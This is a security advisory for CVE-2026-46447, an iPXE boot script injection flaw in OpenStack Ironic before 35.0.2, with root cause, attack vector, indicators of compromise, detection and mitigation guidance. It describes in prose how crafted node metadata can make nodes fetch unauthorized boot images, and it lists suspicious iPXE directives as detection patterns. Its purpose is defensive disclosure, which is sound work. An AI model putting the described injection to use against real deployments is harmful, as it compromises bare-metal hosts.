CVE-2026-46447 Overview
CVE-2026-46447 is a boot script injection vulnerability in OpenStack Ironic, the bare-metal provisioning service for OpenStack clouds. The flaw exists in versions prior to 35.0.2 and allows an authenticated attacker to inject malicious iPXE script content if they can set node.driver_info or node.instance_info. The vulnerability is classified under CWE-669: Incorrect Resource Transfer Between Spheres. Successful exploitation enables manipulation of the bare-metal boot process, undermining the integrity of provisioned nodes.
Critical Impact
Attackers with privileged access to node configuration can inject arbitrary iPXE boot scripts, compromising the integrity of provisioned bare-metal hardware during boot.
Affected Products
- OpenStack Ironic versions before 35.0.2
- Deployments using iPXE boot with attacker-controllable node.driver_info
- Deployments using iPXE boot with attacker-controllable node.instance_info
Discovery Timeline
- 2026-06-03 - CVE-2026-46447 published to NVD
- 2026-06-04 - Last updated in NVD database
Technical Details for CVE-2026-46447
Vulnerability Analysis
OpenStack Ironic provisions bare-metal nodes by generating iPXE scripts that direct each node to download a kernel, ramdisk, and supporting configuration. The script content is composed from fields stored on the node object, including driver_info and instance_info. Before version 35.0.2, Ironic did not adequately constrain values from these fields when they were rendered into the iPXE script.
An attacker with permission to write to node.driver_info or node.instance_info can place crafted content into one of these fields. When Ironic generates the iPXE boot script for that node, the injected content becomes part of the script executed by iPXE during boot. This crosses a trust boundary between API-level metadata and the firmware-stage boot process, which matches the [CWE-669] resource-transfer pattern.
The attack requires high privileges and high complexity, but the scope is changed because the injected script controls components outside Ironic itself, including the kernel and ramdisk loaded onto the bare-metal host.
Root Cause
The root cause is insufficient validation and sanitization of node metadata fields used as input to iPXE script generation. Values from node.driver_info and node.instance_info were treated as trusted boot configuration rather than untrusted user input requiring escaping or allow-list validation.
Attack Vector
An authenticated user or compromised service account with rights to modify node attributes sets malicious content within driver_info or instance_info. When the target node is rebooted or re-provisioned, Ironic produces an iPXE script containing the injected directives. The bare-metal host then executes the attacker-influenced boot sequence, which can redirect it to fetch unauthorized images or alter kernel command-line parameters.
No verified public proof-of-concept code is available. See the OpenStack Security Advisory OSSA-2026-017 and the Launchpad bug report for technical details.
Detection Methods for CVE-2026-46447
Indicators of Compromise
- Unexpected iPXE directives such as chain, kernel, or initrd referencing external URLs in generated boot scripts.
- Modifications to node.driver_info or node.instance_info from accounts that do not normally provision nodes.
- Bare-metal nodes booting from kernel or ramdisk images not present in the approved Glance image catalog.
Detection Strategies
- Audit Ironic API logs for PATCH and PUT requests targeting node objects, focusing on changes to driver_info and instance_info keys.
- Compare rendered iPXE scripts in the TFTP/HTTP boot directory against a known-good template and flag any embedded newlines or unexpected commands.
- Correlate node provisioning events with the identity of the requester and the source IP from Keystone authentication logs.
Monitoring Recommendations
- Forward Ironic conductor and API logs to a centralized SIEM for retention and correlation with identity events.
- Alert on any deviation between the iPXE script template and the rendered output served to PXE clients.
- Track outbound HTTP requests from bare-metal nodes during boot to detect retrieval of unauthorized payloads.
How to Mitigate CVE-2026-46447
Immediate Actions Required
- Upgrade OpenStack Ironic to version 35.0.2 or later, which contains the fix for this vulnerability.
- Review and restrict Keystone role assignments that grant write access to node objects, especially driver_info and instance_info.
- Audit recent changes to node metadata for unexpected values referencing external URLs or shell-like syntax.
Patch Information
The OpenStack project addressed this issue in Ironic 35.0.2. Refer to the OpenStack Security Advisory OSSA-2026-017 and the upstream Openwall disclosure for version and patch references. Operators running stable branches should apply the corresponding backports published by the Ironic project.
Workarounds
- Limit API access so that only trusted operators can modify node.driver_info and node.instance_info until patches are applied.
- Use signed boot images and verify kernel and ramdisk checksums during provisioning workflows.
- Serve iPXE scripts over authenticated, integrity-protected channels and restrict the boot network to known node MAC addresses.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
